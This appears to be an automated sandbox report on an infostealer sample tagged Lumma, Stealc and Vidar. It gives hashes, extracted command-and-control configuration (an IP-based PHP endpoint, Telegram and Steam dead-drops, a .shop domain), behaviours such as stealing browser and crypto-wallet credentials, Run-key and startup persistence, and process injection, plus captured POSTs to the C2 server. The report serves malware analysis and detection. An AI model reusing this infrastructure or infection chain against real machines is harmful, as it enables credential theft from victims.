lumma | c45269675dbf15f6ef65637952f5e57c50f124f2182bb6d526cff137bdd07008

Analysis

max time kernel
21s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
25/09/2024, 15:05 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

326KB
MD5

93d82638ef554a5117ce5b0d23449d01
SHA1

72f96fae5b89aec666887d34655552e8f9cca90b
SHA256

c45269675dbf15f6ef65637952f5e57c50f124f2182bb6d526cff137bdd07008
SHA512

271b1a758070354bb1ae8530c21fa7a25937f739b1d2844dc0c23a8984e3a8e5b0478e7bc6053e36dbcaa460eca814e751d770553b224c0081e46981d8ad2a79
SSDEEP

6144:G64ysmRhhpPdrxp7jylbwq6sua07m680VqjS65EkSDcVtw4ufST7/JcG6EO:GdmnVxp0XNua07m30Vqjz5EHAVO4u672

Score

10^/10

lumma stealc vidar 3a15237aa92dcd8ccca447211fb5fc2a default credential_access discovery persistence spyware stealer

Malware Config

Extracted

Family

stealc

Botnet

default

http://46.8.231.109

Attributes

url_path
/c4754d4f680ead72.php

Extracted

Family

vidar

Version

Botnet

3a15237aa92dcd8ccca447211fb5fc2a

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

lumma

https://drawzhotdog.shop/api

Signatures

Detect Vidar Stealer 7 IoCs

stealer

resource	yara_rule
behavioral2/memory/5084-121-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/5084-120-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/5084-117-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/5084-402-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/5084-450-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/5084-503-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/5084-547-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	MFDBG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	AdminBGDAAKJJDA.exe

Drops startup file 64 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_eb863af8e0ba41f79f1a91d61243893a.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_0ef2695b6ca841888d6bd18d44bfa80a.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_0f25ae5174ef40459758d9998d52700e.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_3b3aa39bad234605a730e9ada397495a.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_5d762c9fdf3a406a9c86a44df61aa64c.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_6a5fe065ef0d4a39850e70250eddd9ef.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_3d3127449dd64fb9a0a6474c86dc6130.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_c08bf40a076743cea520c83c755851c2.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_c2d011e729ee47a0a74a4c6eb49e609a.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_39b5a2458a324fa9b050f1eaa2846885.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_a3377dac05bf485899bc8a41a5e1e459.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_2e28ec141a7e4724916ac4a03b339a75.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_eb8c68e9b4fb4e8da82bc059893e3a1d.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_c1a00fda615d405d93c61ac2f3ea5e55.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_4076acc4b218482eba0b0fcdc813d638.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_7789cc3a5fc04ec5bfb1c75a6486b2c2.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_3e8cd5fff2f343b5b533aaf073d5a4cc.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_b9bc139b679a4e458963666c6f551e90.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_34fc6757080f47eca0692101a60fe3f8.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_0f9a0f5809e74d489db32ee81a76b77d.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_2dbfd041cea64afc90348b8e3142b8da.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_8afdd111ac9b4a8d813065f62e74e809.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_9b799eb3caee4f4bba07e7e0705d463f.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_25ebc87eadce403e8b49d34c4a4f8d12.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_b648c6038a7b41dd8ca5f4c5587c2a60.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_80f8ab6a824241f2954702bf16bcde50.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_270df163ae72478fb276268ee3addf9b.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_46c03a833884456b97f0b48ad6fe30d1.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_86e7edc4871f474f99759392fcfc16bb.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_208d4279d6314e409210f83d4edaeec4.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_b41096ff003646beb60c23a9deb1606f.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_e966614b8fd543c184c8d867dc5b4086.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_f681c67a48474b48b611f672f519278c.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_e9a8635ebcff4188827c4cf73fef3b2c.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_0919a01cd59343d695f4a9e39ba56384.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_97178edb4e4940f1b5dbdf5bf2f2f1eb.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_8af735ab2ecc44a0bf4c773f42969fba.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_e776fde936e849d8b4f833486335aa41.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_127ce9645b6a498b973c7c1618502287.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_9dfe0a9a8bf0475eae0033dc44bc1f4d.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_093271ed941b4038aacb76f7ff91c1c8.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_5a0915c7871d4bb0912f3da4f5104143.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_039bb9e49e924692b915e739f8778152.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_e6ddb34d1095450c9df8c5dea9f86dc8.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_5e14423fc5f047ad80d00b1e7f862bee.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_d0bf75d5457a40b68bc58ea857d97141.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_283899d4d74c48689f9fc84044c992dc.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_6b2c2347e65f4637b2e53e10b5edca88.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_1ecafc541a5046a3b213b5c911dbd8ac.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_e67e8052f4344adfb814a0ecf6e263b7.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_c709d5dfa6174fc7af4dba86940221d3.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_2ae8d5fa2597437197429336ade16b10.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_fcf19579e064470bb1b13ae4060bf348.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_bbc1470263ce459eb956b71afbaed829.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_7fc32701394d4baab4d352525bf316e0.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_7e57cc70debc4cccb6e83a5a3955d401.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_69cad9fb26b4466293753df6ed761ac2.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_9f13bd7c495c45dcbc05287a6ccd197d.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_8db6ce3213b142dbaa6fd5378da0a1bd.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_9ba5d68a35e043ce8d51786cbdc0e3d8.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_a1da8378b43e4ebd899aab29f2ec82a0.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_684f2e06c2a84ffc9c7d3e4e42c08620.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_c37ccef4529a4ecebd6bbd8451ba7ab0.lnk	MFDBG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_a0b363f57698462698bf94505dea7d12.lnk	MFDBG.exe

Executes dropped EXE 5 IoCs

pid	Process
1016	AdminFCFIJEBFCG.exe
2344	AdminIIIEBAAFBF.exe
4140	AdminBGDAAKJJDA.exe
4284	MFDBG.exe
3256	FDWDZ.exe

Loads dropped DLL 2 IoCs

pid	Process
884	RegAsm.exe
884	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MFDBG_05c3de3d5f45421b91aafd70ab9ce1eb = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Malewmf\\MFDBG.exe"	AdminBGDAAKJJDA.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	api.ipify.org

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2184 set thread context of 884	2184	file.exe	90
PID 1016 set thread context of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 2344 set thread context of 2240	2344	AdminIIIEBAAFBF.exe	111

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdminBGDAAKJJDA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdminIIIEBAAFBF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MFDBG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdminFCFIJEBFCG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FDWDZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
884	RegAsm.exe
884	RegAsm.exe
884	RegAsm.exe
884	RegAsm.exe
5084	RegAsm.exe
5084	RegAsm.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe
4284	MFDBG.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4284	MFDBG.exe
Token: SeDebugPrivilege	3256	FDWDZ.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 2184 wrote to memory of 2836	2184	file.exe	89
PID 2184 wrote to memory of 2836	2184	file.exe	89
PID 2184 wrote to memory of 2836	2184	file.exe	89
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 2184 wrote to memory of 884	2184	file.exe	90
PID 884 wrote to memory of 2912	884	RegAsm.exe	96
PID 884 wrote to memory of 2912	884	RegAsm.exe	96
PID 884 wrote to memory of 2912	884	RegAsm.exe	96
PID 2912 wrote to memory of 1016	2912	cmd.exe	98
PID 2912 wrote to memory of 1016	2912	cmd.exe	98
PID 2912 wrote to memory of 1016	2912	cmd.exe	98
PID 884 wrote to memory of 2212	884	RegAsm.exe	100
PID 884 wrote to memory of 2212	884	RegAsm.exe	100
PID 884 wrote to memory of 2212	884	RegAsm.exe	100
PID 884 wrote to memory of 2612	884	RegAsm.exe	102
PID 884 wrote to memory of 2612	884	RegAsm.exe	102
PID 884 wrote to memory of 2612	884	RegAsm.exe	102
PID 2212 wrote to memory of 2344	2212	cmd.exe	103
PID 2212 wrote to memory of 2344	2212	cmd.exe	103
PID 2212 wrote to memory of 2344	2212	cmd.exe	103
PID 2612 wrote to memory of 4140	2612	cmd.exe	106
PID 2612 wrote to memory of 4140	2612	cmd.exe	106
PID 2612 wrote to memory of 4140	2612	cmd.exe	106
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 1016 wrote to memory of 5084	1016	AdminFCFIJEBFCG.exe	107
PID 4140 wrote to memory of 4284	4140	AdminBGDAAKJJDA.exe	108
PID 4140 wrote to memory of 4284	4140	AdminBGDAAKJJDA.exe	108
PID 4140 wrote to memory of 4284	4140	AdminBGDAAKJJDA.exe	108
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 2344 wrote to memory of 2240	2344	AdminIIIEBAAFBF.exe	111
PID 4284 wrote to memory of 3256	4284	MFDBG.exe	112
PID 4284 wrote to memory of 3256	4284	MFDBG.exe	112
PID 4284 wrote to memory of 3256	4284	MFDBG.exe	112

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:2836
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminFCFIJEBFCG.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2912
  - - C:\Users\AdminFCFIJEBFCG.exe
      "C:\Users\AdminFCFIJEBFCG.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1016
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminIIIEBAAFBF.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Users\AdminIIIEBAAFBF.exe
      "C:\Users\AdminIIIEBAAFBF.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2344
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2240
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminBGDAAKJJDA.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Users\AdminBGDAAKJJDA.exe
      "C:\Users\AdminBGDAAKJJDA.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4140
    - - C:\Users\Admin\AppData\Local\Temp\Malewmf\MFDBG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Malewmf\MFDBG.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4284
      - C:\Users\Admin\AppData\Local\Temp\Malewmf\FDWDZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Malewmf\FDWDZ.exe" --checker
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3256

Network

DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

4.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
GET

http://46.8.231.109/

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET / HTTP/1.1
Host: 46.8.231.109
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC
Host: 46.8.231.109
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBG
Host: 46.8.231.109
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBF
Host: 46.8.231.109
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:10 GMT
